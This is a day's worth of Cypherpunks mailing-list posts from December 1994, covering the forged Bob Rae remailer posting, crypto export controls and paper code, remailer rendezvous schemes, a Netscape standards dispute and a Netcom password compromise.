Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuuLhCoZzwIn1bdtAQFi3QF+KaUcUOTrly37pZkowVc313X3qq+4Jy/j O9X/cSYleflVJl1rplCHm8cKB1KE0ICF =a9ik -----END PGP SIGNATURE----- From schneier at chinet.chinet.com Sun Dec 11 15:26:26 1994 From: schneier at chinet.chinet.com (Bruce Schneier) Date: Sun, 11 Dec 94 15:26:26 PST Subject: Articles on RC5 and GOST in January 95 Dr Dobbs Journal Message-ID: In the Jan 95 issue of Dr Dobbs Journal, you will find the following: An editorial on the public release of RC4 (without code). An article by me on GOST (with code). An article by Ron Rivest on RC5 (without code). Remember, you can export cryptographic source code in paper form. Bruce From hfinney at shell.portal.com Sun Dec 11 15:39:06 1994 From: hfinney at shell.portal.com (Hal) Date: Sun, 11 Dec 94 15:39:06 PST Subject: Storm Brewing Over Forged Bob Rae Posting? In-Reply-To: <199412112037.MAA16882@netcom18.netcom.com> Message-ID: <199412112338.PAA18920@jobe.shell.portal.com> Ironically, I did not know about this brouhaha until reading about it here today. A few days ago I got this email: Subject: Premier Bob To: hfinney at jobe.shell.portal.com Date: Fri, 9 Dec 94 8:10:36 EST Congrulations! Your forgery made the Globe and Mail today. This meant nothing to me so I ignored it. But on reading the article this appears to be a major incident, involving heated accusations and walkouts on the floor of the Ontario legislature. The Portal system, the internet service provider I use, has apparently taken some heat but they have not contacted me. A thread in can.politics titled "The Bob Rae Forgery Caper" includes a copy of the original message. Here are some excerpts from the Globe and Mail article, which was widely cross-posted. >TORONTO - Progressive Conservative Leader Michael Harris caused an >uproar in the Ontario Legislature yesterday by presenting a prank >letter circulating on the Internet computer system that is >purported to have been written by Premier Bob Rae. > The computer message has Mr. Rae making tasteless references to >Ontario's Attorney-General Marion Boyd and commenting on the trial >of Karla Homolka, who was convicted in the slayings of two Ontario >schoolgirls. > A copy of the letter obtained by The Globe and Mail warns that >"this message is NOT from the person listed in the from line. It is >from an automated software remailing service" in California. This >message was on the letter from the time the company received it and >passed it on to the computer bulletin board where Internet users >can read it, said Gwen Rachlin, director of operations for Portal >Communications of Cupertino, Calif., through which the message was >posted. >[...] > Ms. Rachlin said the company received a call from police about >the letter yesterday afternoon. But she said the company had >already had "some incidents" with the source of the message. She >added that she was ready to co-operate with the police. > The source of the message was an account that provides a service >that allows people anonymous access to the Internet, she said. > Mr. Sherman said it is very easy to post a false message on a >bulletin board and to make it appear that it came from a computer >different from the one that sent it. > By going through a California bulletin board, "obviously someone >has gone way out of their way to send that in," Mr. Sherman >added. > Even so, the message can be traced, said Rick Broadhead, co- >author of The Canadian Internet Handbook. "If they [the sender] >have gone through a service, it is going to take some more work to >trace it," Mr. Broadhead said. But looking at the log records of >the computer service, police can follow the message back to the >originating computer. I do not have any logs of this message. However, my remailer does not insert any delays so it is conceivable that sendmail logs could give some insight into message flow through the remailer. I don't know what obligation I would be under to cooperate with any investigation. The message itself had some pointed political satire but did not look to me to violate any US laws. There is not much I can do to help, anyway. The article indicated that the legislature has now gone into recess for the year so hopefully this will all be old news by the time they reconvene. One thing I do notice on reading the discussion in can.politics is the fact that despite the disclaimers in the message headers, some people took this as a forgery attempt on my part. I wonder if it might be necessary to insert disclaimers into the body of the message as anon.penet.fi does, at least for messages to known mail-to-news gateways. There was also a misperception that my remailer was an official effort endorsed by Portal (again, despite the disclaimers). Note that it was they who were contacted, not me (yet). This might suggest that it will not be possible to cleanly separate the remailer operators and service providers when problems like this arise. Both may end up being hassled (time will tell whether I am). It should be interesting to see what happens. Hal From ianf at sydney.sgi.com Sun Dec 11 15:42:22 1994 From: ianf at sydney.sgi.com (Ian Farquhar) Date: Sun, 11 Dec 94 15:42:22 PST Subject: A few articles of interest... In-Reply-To: <199412111825.KAA24116@desiree.teleport.com> Message-ID: <9412121029.ZM10788@wiley.sydney.sgi.com> Whoops. I have a nasty feeling that a brushed key might just have sent an unedited version to the list. If so, my apologies. On Dec 11, 10:27am, Alan Olsen wrote: > - Bruce Schneier has an article on GOST. (A Soviet varient on DES.) GOST is not a variant on DES. It is the Soviet equivalent of DES. The algorithms do have some similarities (eg. the use of S-boxes to provide diffusion), it is a Feistal network, but is in other ways interestingly different. I believe that it has been undergoing quite a bit of Western cryptanalysis over the past year, although I have not seen any results as yet. IMO, one of the most interesting features of GOST is that the S-boxes are not specified in the algorithm's definition. Apparently you had to apply to the government for them, and they would respond with ones they wanted you to have. It is presumed that the security of the ones you were given depended on how much they trusted you, and how much they wanted what you were protecting to remain a secret. I recall that Matt (?) posted a set of standard non-classified (probably low-security) Soviet S-boxes for GOST a couple of months ago. Ian. From werewolf at io.org Sun Dec 11 15:47:31 1994 From: werewolf at io.org (Mark Terka) Date: Sun, 11 Dec 94 15:47:31 PST Subject: Storm Brewing Over Forged Bob Rae Posting? In-Reply-To: <199412112031.MAA21646@netcom12.netcom.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- In article <199412112031.MAA21646 at netcom12.netcom.com>, mpd at netcom.com (Mike Duvos) wrote: > > Now all the lame press (and some even LAMER USENET readers) are screaming > > foul. I bet there will be renewed interest in the cypherpunk remailer's in > > the next few days :> > >I suppose this means we need strong laws against "message laundering." Hey, don't kid yourself! I have read comments to the extent that anon remailers like the cypherpunks system should be BANNED! Seriously....another good reason for putting more in Europe if possible. Here's an idea. Someone mentioned trying to set up an anon remailer on the North American Freenets, but it seemed there were software compatibility problems. Well, if we could solve the problem, assuming the Freenets in Europe use the same software, we could set a few up in Europe ourselves from this side of the pond. You could telnet into a Euro-Freenet (although some like Helsinki had restrictions on members being citizens of the country) establish an account and then e-mail the software to your account overseas. Would this be practical? Sounds like it would be worth a shot. But again, I guess it comes down to the software compatibility problem. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBLuuFcHBFBj7pSNyhAQF61gf/ZyrleHTVK61ruT7SvT+3BOHTYNo1eZHa FMnEoMDGm99f0Ckr8pFwAMQcBSMEeskdg2OKjluVG8KG5y4zvejueGqElETiAkbB XkOK+v1iAe8WFFyy3Fu0lYR/jfEcghOf1WmaJ7IRn/XTPgSlS0k21iXBC1tHSEhZ guQRXLZC3XW8DPXBC61F2fzID/ogvXE9ATvyxEem88BOnAyUwXNsk649biGFrczh grwGT3BUxYMk3zYTYusnC9XxUZ3JjtbiLVpZ+9e8GKNTtyR3qqxJhloZBBOxDlyx kUH1lhNeI8qWHsaZQui1FrsG+O15ZHV7/d8Rk7teXLMFBafgJRpEHQ== =0VL9 -----END PGP SIGNATURE----- From ianf at sydney.sgi.com Sun Dec 11 15:56:29 1994 From: ianf at sydney.sgi.com (Ian Farquhar) Date: Sun, 11 Dec 94 15:56:29 PST Subject: Articles on RC5 and GOST in January 95 Dr Dobbs Journal In-Reply-To: Message-ID: <9412121048.ZM10865@wiley.sydney.sgi.com> On Dec 11, 5:25pm, Bruce Schneier wrote: > Remember, you can export cryptographic source code in paper form. Now there's an interesting thought... Many of you will remember the heady days of the early 1980's, when it was customary for PC magazines to include substantial amounts of code in their pages (often 25% or so of the magazine). This all had to be typed in by hand, and especially in the case of BASIC programs (there was only BASIC in those days really, it was the lowest common demoninator) containing machine code, they would also almost always have checksums to make sure that what was typed in was correct. This was never a lot of fun. I did it a few times myself. That cured me for life from repeating the exercise. Around the mid 1980's a rather interesting device appeared. It was essentially an automated scanner for high-density barcodes. You photocopied the magazine page containing these 25 cm (or whatever) barcode strips, which you fed into the reader. It scanned the contents of the barcode, and voila, a working program. At least in theory. The downfall of this system is that the reader cost several hundred dollars, and almost nobody could afford them. It never quite caught on. Even so, I really wonder if the export of cryptography ON PAPER but in a machine-readable form would be in violation of ITAR? If anyone has one of these old scanner, it might very well be worth trying. Ian. From jamesd at netcom.com Sun Dec 11 16:15:34 1994 From: jamesd at netcom.com (James A. Donald) Date: Sun, 11 Dec 94 16:15:34 PST Subject: Storm Brewing Over Forged Bob Rae Posting? In-Reply-To: <199412112338.PAA18920@jobe.shell.portal.com> Message-ID: <199412120014.QAA10945@netcom10.netcom.com> Hal writes > One thing I do notice on reading the discussion in can.politics is the > fact that despite the disclaimers in the message headers, some people > took this as a forgery attempt on my part. I wonder if it might be > necessary to insert disclaimers into the body of the message as > anon.penet.fi does, at least for messages to known mail-to-news > gateways. Relax: The world has an unlimited supply of idiots, and nobody takes them seriously. If you have ever posted satires, you will observe that no matter how blatant the satire, and how many clues you put in that it is a satire, you will always get indignant replies that take you seriously. -- --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From jrochkin at cs.oberlin.edu Sun Dec 11 16:16:05 1994 From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) Date: Sun, 11 Dec 94 16:16:05 PST Subject: Broadcasts and the Rendezvous Problem Message-ID: At 5:48 PM 12/11/94, L. Todd Masco wrote: >This is where my train of thought dovetails with the newsgroup question: >bringing a new remailer on line could be achieved by broadcasting a message >through a newsgroup specifying the location and type of the remailer. If >necessary, one or more pseudonymous automatic testing agents could pick up >the message and put the remailer through a barrage of tests, broadcasting >a "remailer certification" with a certain duration. "Premail++" and >remailers could find their next hop by examining current certifications >and choosing one with desired characteristics, scoring by trusted testing >agents and other criteria (including the passage of time since the last >certification). If an exit-remailer is chosen early in the game, multiple >paths to the exit-remailer can be used to improve reliability (exit- >remailers would also probably have a shorter cycle of certification). I tried to discuss a very similar plan several months ago (maybe as long ago as a year, I don't remember). No one seemed interested in it. Many people seemed to think that a newsgroup for this sort of a thing was a waste of bandwith. I don't really agree, and think that the bandwith is neccesary for a distributed method of making the remailer net more robust to remailers popping into and out of existence. I still think it's a good idea though. shrug. maybe people will like it better this time around. From tcmay at netcom.com Sun Dec 11 16:18:01 1994 From: tcmay at netcom.com (Timothy C. May) Date: Sun, 11 Dec 94 16:18:01 PST Subject: Articles on RC5 and GOST in January 95 Dr Dobbs Journal In-Reply-To: <9412121048.ZM10865@wiley.sydney.sgi.com> Message-ID: <199412120017.QAA18598@netcom14.netcom.com> Ian Farquhar wrote: > Many of you will remember the heady days of the early 1980's, when it was > customary for PC magazines to include substantial amounts of code in their > pages (often 25% or so of the magazine). This all had to be typed in by ... > Around the mid 1980's a rather interesting device appeared. It was essentially > an automated scanner for high-density barcodes. You photocopied the magazine > page containing these 25 cm (or whatever) barcode strips, which you fed into > the reader. It scanned the contents of the barcode, and voila, a working > program. At least in theory. The downfall of this system is that the reader > cost several hundred dollars, and almost nobody could afford them. It never > quite caught on. "Cauzin Softstrips" was the product, as I recall. I wouldn't use the word "quite" in "It never quite caught on," except in irony, as I'm pretty sure essentially _no_ such machines were sold. Maybe a few, but not many more. > Even so, I really wonder if the export of cryptography ON PAPER but in a > machine-readable form would be in violation of ITAR? If anyone has one of > these old scanner, it might very well be worth trying. We had this discusssion a while back, when Phil Karn was trying for an export license for Bruce's software. OCR recognition rates are already close to 100% for monospaced fonts like Courier (at least many of us see this...I have TypeReader and it does very well with such fonts), and could be made even higher. In my view, the whole export issue is a joke anyway. Anyone with access to Bruce's code could quite easily remail it, with or without first hiding the exact form by compressing, encrypting, or stegging it. That this hasn't happened--so far as we (or I) know--says more about other things than about the laws supposedly barring such export. I'm not saying it wouldn't be an interesting test case, though. Hard to imagine it happening. I expect the test case could come just as easily be printing up the code in Courier, or OCR2, and prominently putting "Insert this end into OCR machine" or somesuch....and then calling attention to this as one crosses the borders. (I'd guess the outgoing Customs inspection would be nonexistent, as usual, and that such an attempt to trigger a test case would be fruitless.) --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From amanda at intercon.com Sun Dec 11 16:30:00 1994 From: amanda at intercon.com (Amanda Walker) Date: Sun, 11 Dec 94 16:30:00 PST Subject: Netscape competence Message-ID: <199412120029.TAA00724@intercon.com> Excuse me, but Adam Shostack didn't write that paragraph you quoted. Amanda Walker did, as I recall. Nope, Adam wrote it. I just followed up to him with additional vitriol :). Amanda Walker InterCon Systems Corporation From werewolf at io.org Sun Dec 11 16:33:53 1994 From: werewolf at io.org (Mark Terka) Date: Sun, 11 Dec 94 16:33:53 PST Subject: Globe and Mail Article On Forged Posting Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Ok, here is the text of the story about the "Forged Bob Rae Posting" from the Toronto Globe and Mail. An examination of the story only indicates how far our journalists and politicians have to go in understanding the Internet! ============================================================================ Tories cause uproar in legislature Rae furious after Harris distributes prank letter circulating on Internet - From THE GLOBE AND MAIL, Toronto, December 9, 1994 pg A6 BY JAMES RUSK and MARTIN MITTELSTAEDT Queen's Park Bureau TORONTO - Progressive Conservative Leader Michael Harris caused an uproar in the Ontario Legislature yesterday by presenting a prank letter circulating on the Internet computer system that is purported to have been written by Premier Bob Rae. The computer message has Mr. Rae making tasteless references to Ontario's Attorney-General Marion Boyd and commenting on the trial of Karla Homolka, who was convicted in the slayings of two Ontario schoolgirls. A copy of the letter obtained by The Globe and Mail warns that "this message is NOT from the person listed in the from line. It is from an automated software remailing service" in California. This message was on the letter from the time the company received it and passed it on to the computer bulletin board where Internet users can read it, said Gwen Rachlin, director of operations for Portal Communications of Cupertino, Calif., through which the message was posted. However, the copy distributed by the Conservatives yesterday did not contain any notice that it was a fake, and Mr. Harris made the sensational claim that the letter could indicate a security lapse in the Premier's Office. A furious Mr. Rae criticized Mr. Harris outside the legislature, accusing him of leading to the "Americanization of Canadian politics" through the use of "dirty tricks. "I really do think that Mr. Harris has reached a genuine new low. I think it's a low that I hadn't anticipated he would hit, but in my book he's hit it," Mr. Rae said. It is relatively easy for an Internet user to send fake messages on the system, which links millions of computer users around the world. But Mr. Harris said a lapse could have occurred in the Premier's Office, allowing someone to send the letter. Mr. Harris told reporters that he raised the issue out of a sense of worry that foreign governments could get on the Internet and place fake messages about the province. He was quick to add that he didn't think the Premier wrote the letter. "Clearly it didn't come from the Premier or anyone close to the Premier. But it does raise the security question," Mr. Harris told reporters. Mr. Rae lashed out at what he called "the dirty tricks stuff, the right-wing nonsense that he's coming up with every day. . . and then this stuff." When Mr. Rae found out Mr.Harris's aides had distributed the letter to the media, he said he couldn't believe the party "would engage in that kind of tactic. This is unbelievable. Today, you have managed to lower the tone of this place. " The Premier then stormed out, and the Speaker called a 15-minute recess to allow the tempers of the MPPs, many of whom were shouting at each other, to cool. It was the last day of this sitting of the House. The copy of the letter distributed by the Tories to the media had the obscene references blacked out, although Mr. Harris had given Mr.Rae an original copy. A press release issued by the Conservatives referred to Mr. Rae as "road-kill on the Information Highway," and exulted, "Internet Bob: the hacker is hacked. " Mr. Rae called these comments "bizarre." The phony message, which was posted on Saturday in a computer bulletin board called ont.general, was discovered by the Premier's Office on Tuesday, but the office decided that it could do nothing about it. Mr. Rae recently announced that he had an address on the Internet. Ont.general is a computer bulletin board on which Internet users discuss life and public issues in the province, said Larry Sherman, president of Internet Seminars of Woodbridge. A message can be removed from the board only by whoever posted it, and it was decided that to make a fuss about it would draw unnecessary attention to it, an official in the Premier's Office said. The official, who asked not to be named, said the office has not launched an investigation into where the message came from. Ms. Rachlin said the company received a call from police about the letter yesterday afternoon. But she said the company had already had "some incidents" with the source of the message. She added that she was ready to co-operate with the police. The source of the message was an account that provides a service that allows people anonymous access to the Internet, she said. Mr. Sherman said it is very easy to post a false message on a bulletin board and to make it appear that it came from a computer different from the one that sent it. By going through a California bulletin board, "obviously someone has gone way out of their way to send that in," Mr. Sherman added. Even so, the message can be traced, said Rick Broadhead, co- author of The Canadian Internet Handbook. "If they [the sender] have gone through a service, it is going to take some more work to trace it," Mr. Broadhead said. But looking at the log records of the computer service, police can follow the message back to the originating computer. The use by the Conservatives of the fake letter again puts the spotlight on the party. Last months, the Tories played pranks at an NDP convention sending in a camera crew that shot pictures ridiculing Mr. Rae, including a doctored video sequence that seemed to give the Premier a stutter. The picture were broadcast as dinner-time entertainment at a Conservative convention the same weekend. The Tories also bought a copy of a labour bill sold at an NDP fund raising and paraded it around their convention like captured trophy. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBLuuWG3BFBj7pSNyhAQG9mQf+PkUbz0M1KGoEF74yhFppu90+P7NUP0QW ew1Hzb0kTX214vCGSepo5+UTD2VRE9xuLSbQKH3HQAaXwL+LTS1sCUcRSOdWHG+4 u0NcNHVsY/rBojeEirWDa+5+Ma1fsfYKa9hq0qdzimbvP5UUQA/y9PGkh7o1Y/fn ad3v6t2ttOEHrYu7YBq4DX9HUcMGMJrGY3FQQhKEzuWnIRyc/x33XFj/M9x8p+uf wh9h4FJFE5jWp520P3mmAK0+10F/IbmxUJ2f4RTBawOwEVViOM6gYm1XnCsxO1YB BG9HPLBJUMquLkpPu9GxtmNsX5Dmtcipr8ZADz/szT3b7bxIUzqHww== =SNgW -----END PGP SIGNATURE----- From fhalper at pilot.njin.net Sun Dec 11 16:36:43 1994 From: fhalper at pilot.njin.net (Frederic Halper) Date: Sun, 11 Dec 94 16:36:43 PST Subject: What Happened to Xenon ? Message-ID: <9412120036.AA22711@pilot.njin.net> It seems he lost his Internet access(I think he moved to work at some university which does not have an Internet node). The Macintosh Cryptography Interface Project list which he started to make some porgress in getting a mac like inter -face for PGP still exists. I can give you the necessary info if you'd like. -RH- --------------------------------------------------------------------------------- Reuben Halper I'm not growing up, I'm just burnin' out." Montclair High - Green Day - Montclair, NJ E-mail: fhalper at pilot.njin.net PGP 2.6ui Public Key available upon request --------------------------------------------------------------------------------- From amanda at intercon.com Sun Dec 11 16:41:41 1994 From: amanda at intercon.com (Amanda Walker) Date: Sun, 11 Dec 94 16:41:41 PST Subject: BofA+Netscape Message-ID: <199412120041.TAA00883@intercon.com> > Amanda complained that Netscape pisses all over the > standardization committees. > > Well guys, the victor has room to move. It must come as a big > shock to Apple, Microsoft, and IBM, but reality is that Netscape > can set WWW standards and they cannot. I disagree. The WWW is no longer a research project, and if it is to survive it will have to do so by consensus, either formal or informal. That's what standards committees, and groups like the IETF, exist to facilitate. The alternative is fragmentation, which we're already starting to see (in part because of Netscape's unilateral changes to HTML). Let me re-iterate something here: I'm biased. I'm a commercial vendor. I'm perfectly happy to live by the sword and die by the sword if that's how the market ends up--I just think it would be better for the Internet as a whole if the actual on-the-wire protocols and formats become standards, so that people don't have to worry about what clients or servers they are talking to. UI, performance, service, and such are fair game. Infastructure has to be consensus-based or it fails. But hey, if Netscape can innovate by fiat, so can anyone else. Right now, I'm betting that Netscape will decide it's worth cooperating with the standards process. If they don't, they'll just fragment their own market. I can live with that, but I think it would be a shame. Amanda Walker InterCon Systems Corporation From jrochkin at cs.oberlin.edu Sun Dec 11 16:51:50 1994 From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) Date: Sun, 11 Dec 94 16:51:50 PST Subject: Articles on RC5 and GOST in January 95 Dr Dobbs Journal Message-ID: At 7:17 PM 12/11/94, Timothy C. May wrote: >In my view, the whole export issue is a joke anyway. Anyone with >access to Bruce's code could quite easily remail it, with or without >first hiding the exact form by compressing, encrypting, or stegging >it. > >That this hasn't happened--so far as we (or I) know--says more about >other things than about the laws supposedly barring such export. Well, it might actually say quite a bit about such laws, namely that they scare people into _not_ remailing Bruce's code. As is the point of such laws, obviously. So they appear to be working, right? People don't want to do something that is illegal, even if it would be easy to do so. But I had actually kind of assumed that this sort of thing _had_ happened. If anyone in some other country wanted to get a hold of Bruce's code, it would not be dificult to do so. And I figure someone probably has wanted to do such a thing, and probably has done it. If anyone out in non-U.S. land wants Bruce's code, and has been unable to get a hold of it, I bet a posting to alt.privacy.anon-server, or to the cypherpunks list, would result in people volunteering (via anon remailers, of course) to break the export laws. The non-U.S. citizens asking for the code wouldn't be breaking any laws, so they don't even need to use an encrypted address block, they can just ask publically. A U.S. citizen using PGP and going through a chain of 8 or 10 remailers (including non-U.S. ones) is not likely to be caught. Of course I'd never do such a thing, especially after talking about it publically on cypherpunks. From amanda at intercon.com Sun Dec 11 16:56:40 1994 From: amanda at intercon.com (Amanda Walker) Date: Sun, 11 Dec 94 16:56:40 PST Subject: Further comments on Netscape et al. Message-ID: <9412111956.AA21598@eldamar.walker.org> -----BEGIN PRIVACY-ENHANCED MESSAGE----- Proc-Type: 4,MIC-CLEAR Content-Domain: RFC822 Originator-Certificate: MIIB4DCCAXUCBQJBAAI3MA0GCSqGSIb3DQEBAgUAMGMxCzAJBgNVBAYTAlVTMSAw HgYDVQQKExdSU0EgRGF0YSBTZWN1cml0eSwgSW5jLjEyMDAGA1UECxMpVW5hZmZp bGlhdGVkIFVzZXIgQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkwHhcNOTQwNTE2MDAw MDAwWhcNOTYwNTE2MjM1OTU5WjB6MQswCQYDVQQGEwJVUzEOMAwGA1UEERMFMjIw NzAxETAPBgNVBAgTCFZpcmdpbmlhMRAwDgYDVQQHEwdIZXJuZG9uMR4wHAYDVQQJ FBUyMDEgRWxkZW4gU3RyZWV0IKYxNzMxFjAUBgNVBAMTDUFtYW5kYSBXYWxrZXIw XDANBgkqhkiG9w0BAQEFAANLADBIAkEAsYTQHrGTWxpS22owJLNVkmBNxGW6Z8TK 5Qdsg9co9J8uyHOuqEIHIxOIDsVA7X/bsYVXxvitmc5PYKp2RuWj+QIDAQABMA0G CSqGSIb3DQEBAgUAA1YAIR3BS02rsquq3dY6sGWcieXW3HtChMtsReRhDdY/nGPz rIUYuWt087c4T4afrsG9FbouJOkAsR/5SkLI9UpXonDIUskdl4/JlRKpyLaX07RK mUyTSR== MIC-Info: RSA-MD5,RSA, lOMm69acu9EUeHUNrqC3tVCGCxCYQn24LMZIdJLsHHh+yHQUzowi3hysYfSuJEeR 15mklYr0pLdP8HQCyqv4mg== Sigh. I wasn't intending to ignite a firestorm on the list, especially on a topic that is at this point only marginally crypto-related. I bear Netscape and its staff no ill will--they have done some wonderful stuff, and I'd be more than happy to compete with them however the market ends up. I am irritated by some of how they've gone about things, but this is as much cultural as anything else--the market will decide in the end, whatever they or anyone else do. If I have offended anyone on the list or at Netscape, I'm completely willing to continue the discussion in email, comp.infosystems.www, or wherever else, but I'm going to stop sending my replies to cypherpunks at this point unless they actually have to do with cryptography or WWW security per se. Vendors do take potshots at each other from time to time; I'm sorry that I indulged myself and did so on this list instead of in a more appropriate manner. Amanda Walker InterCon Systems Corporation -----END PRIVACY-ENHANCED MESSAGE----- From shamrock at netcom.com Sun Dec 11 17:05:44 1994 From: shamrock at netcom.com (Lucky Green) Date: Sun, 11 Dec 94 17:05:44 PST Subject: Broadcasts and the Rendezvous Problem Message-ID: Tim wrote: >L. Todd Masco wrote: > >> Seems to me that one of the fundamental building blocks necessary to >> a host of anonymous services is a means of rendezvousing in a manner that >> is not vulnerable to traffic analysis. >> >> The obvious solution to this is through the use of a broadcast medium. >> Has anybody created an alt.* group purely for remailer-associated >> rendezvous? > >Isn't this what "alt.anonymous.messages" is all about? > >(It's been at my Netcom site for many months now...I don't recall who >created it, but it seems to me it was one of us.) Which brings us back to the news -> mail gateway. There has to be a better way. I know that a small fraction of the net goes via satelite. Is there a way to inject truely anonymous datagrams? Any hams out there? -- Lucky Green PGP encrypted mail preferred. From shamrock at netcom.com Sun Dec 11 17:05:45 1994 From: shamrock at netcom.com (Lucky Green) Date: Sun, 11 Dec 94 17:05:45 PST Subject: BofA+Netscape Message-ID: [Welcome to the list, Marc. Great to have you here!] Marc Andreessen wrote >In article <9412111647.AA23311 at tadpole.tadpole.com>, db at Tadpole.COM (Doug >Barnes) wrote: > >> I'll throw in that from the perspective of someone running a server, >> their approach of requesting all graphics simultaneously over >> different sockets in the name of client performance is disastrous. >> This causes most servers to fork N times more per page, where N is >> the avg. # of graphics. > >That's just plain not true. Servers don't fork any more often >with Netscape than they do with other clients -- EVER. > >> but some have speculated that this was done deliberately in order >> sabotage server software other than their own. > >That's also just plain not true, and completely unsubstantiated. Marc, have you ever been in an empty lab with an htpd server - late at night? You can HEAR it when Mozzilla hits the site. Two or three Mozzilla users at the same time will kill your server. Unless, I understand, it uses your server software for which you charge money. Can you be surprised that there are a significant number of people out there who are wondering if your "selfless" deed of giving away your client software for free was really all that selfless? -- Lucky Green PGP encrypted mail preferred. From shamrock at netcom.com Sun Dec 11 17:10:40 1994 From: shamrock at netcom.com (Lucky Green) Date: Sun, 11 Dec 94 17:10:40 PST Subject: Storm Brewing Over Forged Bob Rae Posting? Message-ID: Tim wrote: >In yet another piece of news, Netcom has apparently been >hacked/attacked rather badly. The "netcom.general" discussion group >(local to Netcom) is filled with garbage posts, forged posts, >cancelled articles, etc. Messages about "root" being forged appeared, >then disappeared. Netcom is quiet on this, but has been running >"crack" on all of their machines for the last several days--apparently >to (somehow?) help to find security flaws....I have no idea why >running crack to find weak passwords of users is such a high priority. >Maybe the apparent attack is related, maybe not. Netcom has unauthorized access problems for the longest time. My account has been deleted three times in as many months. Neither sysadmin nor accounting had any explanation or record of the deletion. No, I didn't owe them money. This has not been an isolated incident (see the article about Netcom under the fitting title "Sysadmins without a clue" in the Summer '94 issue of 2600). Netcom states in their announcement in netcom.announce that the passwords compromised were of a type that could be found in a dictionary attack. This would explain why they are running crack. Seems someone else has run crack before them. It also seems that root at netcom.com made the mistake of choosing a pw that is subject to a dictionary attack. Well, sysadmins without a clue. -- Lucky Green PGP encrypted mail preferred. From marca at neon.mcom.com Sun Dec 11 17:17:59 1994 From: marca at neon.mcom.com (Marc Andreessen) Date: Sun, 11 Dec 94 17:17:59 PST Subject: BofA+Netscape Message-ID: >have you ever been in an empty lab with an htpd server - late at night? You >can HEAR it when Mozzilla hits the site. Two or three Mozzilla users at the >same time will kill your server. Unless, I understand, it uses your server >software for which you charge money. Wrong wrong wrong, not true, false, unsubstantiated, in error. Attached is a note from the author of WinHTTPD that answers a similar accusation made in news last month. Marc > Newsgroups: comp.infosystems.www.users > Path: flop.mcom.com!news.Stanford.EDU!agate!howland.reston.ans.net!ix.netcom.com!netcom.com!rdenny > From: rdenny at netcom.com (Robert Denny) > Subject: Use WinHTTPD 1.3e! (was: Everyone Please Read!...) > Message-ID: > Organization: NETCOM On-line Communication Services (408 261-4700 guest) > References: <3bcqc1$s7e at news.doit.wisc.edu> <3bfkrg$4a4 at huron.eel.ufl.edu> > Date: Wed, 30 Nov 1994 02:48:54 GMT > Lines: 21 > > In <3bfkrg$4a4 at huron.eel.ufl.edu> chris at surgery.ufl.edu (Chris Barnett) writes: > > >There must be something wrong with your server. I'm running WinHTTPD1.3e > >on a 486-33 w/8MB o' ram and I don't have any problems with Netscape. I > >use Netscape all the time and I've had lots of people using Netscape > >access my server without any problems at all. Granted, there is practically > >nothing on my site (people that said they would write homepages for their > >divisions haven't yet), but I do have a pretty steady load of users and I > >haven't had any problems. Asking everyone else on the Net to change simply > >won't work. > > The irritating thing about this affair is that I have been very vocal about > the latent problems that Netscape uncovered in my server, and I fixed them > as fast as anyone could possibly hope for... I posted an announcement here, > and most every day I reply to some message with the URL of the Windows > HTTPD server's home page. My mail address is all over the docs, and I > have no record of the gentleman asking me about the problem... > > I know, "quit whining and get a life!"... :-) > > -- Bob -- Marc Andreessen Netscape Communications Corporation Mountain View, CA marca at mcom.com From tcmay at netcom.com Sun Dec 11 17:18:33 1994 From: tcmay at netcom.com (Timothy C. May) Date: Sun, 11 Dec 94 17:18:33 PST Subject: Articles on RC5 and GOST in January 95 Dr Dobbs Journal In-Reply-To: Message-ID: <199412120118.RAA03222@netcom17.netcom.com> Jonathan Rochkind wrote: > But I had actually kind of assumed that this sort of thing _had_ happened. > If anyone in some other country wanted to get a hold of Bruce's code, it > would not be dificult to do so. And I figure someone probably has wanted > to do such a thing, and probably has done it. I'm confused. Isn't this precisely what I was saying in my post? That if anyone really wanted it, it's easily and anonymously remailed? I'm not saying no one wants it. As pedagogic material, with the text, it's very useful. But it's not "productized" into a standaone, runnable, item that a lot of people can use (like PGP, for example). > If anyone out in non-U.S. land wants Bruce's code, and has been unable to > get a hold of it, I bet a posting to alt.privacy.anon-server, or to the > cypherpunks list, would result in people volunteering (via anon remailers, > of course) to break the export laws. The non-U.S. citizens asking for the > code wouldn't be breaking any laws, so they don't even need to use an > encrypted address block, they can just ask publically. A U.S. citizen using > PGP and going through a chain of 8 or 10 remailers (including non-U.S. > ones) is not likely to be caught. Which is what I said in my post. --Tim -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From jdwilson at gold.chem.hawaii.edu Sun Dec 11 17:32:30 1994 From: jdwilson at gold.chem.hawaii.edu (NetSurfer) Date: Sun, 11 Dec 94 17:32:30 PST Subject: Storm Brewing Over Forged Bob Rae Posting? Message-ID: <199412120137.UAA26688@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- On Sun, 11 Dec 1994, Mark Terka wrote: > Here's an idea. Someone mentioned trying to set up an anon remailer on the > North American Freenets, but it seemed there were software compatibility > problems. > > Would this be practical? Sounds like it would be worth a shot. But again, I > guess it comes down to the software compatibility problem. Yep, if you get info on Freeport (the most common Freenet software) they tell you up front that you will need a Unix programmer and network type to install and maintain it. And it isn't freeware, regardless of the name. It is a time-period license which you have to renew every few years... - -NetSurfer #include 